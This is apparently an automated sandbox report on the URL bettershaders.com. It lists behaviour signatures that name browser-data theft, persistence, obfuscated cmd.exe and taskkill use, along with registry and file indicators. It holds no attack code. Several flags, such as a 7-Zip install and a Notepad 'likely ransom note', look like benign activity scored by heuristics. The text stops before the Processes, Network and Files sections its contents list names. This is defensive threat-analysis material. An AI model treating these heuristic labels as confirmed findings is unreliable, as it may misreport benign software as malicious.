Malware Analysis Report

2025-08-10 12:31

Sample ID 240527-ry7n5afg3x
Target https://bettershaders.com
Tags
discovery persistence spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

Threat Level: Shows suspicious behavior

The file https://bettershaders.com was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery persistence spyware stealer

Loads dropped DLL

Registers COM server for autorun

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Checks installed software on the system

Looks up external IP address via web service

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Kills process with taskkill

Opens file in notepad (likely ransom note)

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 14:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 14:37

Reported

2024-05-27 15:02

Platform

win10v2004-20240508-en

Max time kernel

1199s

Max time network

1174s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bettershaders.com

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Program Files\7-Zip\7zFM.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2406-x64.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sv.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tr.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ta.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\th.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fi.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\he.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\License.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\af.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sl.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip32.dll C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ast.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lv.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ms.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\it.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ga.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.dll C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tt.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\descript.ion C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fur.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eo.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lt.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mn.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pl.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bg.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\co.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ar.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\el.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fa.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cs.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fr.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hr.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\id.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sa.txt C:\Users\Admin\Downloads\7z2406-x64.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133612945434901304" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2406-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2406-x64.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
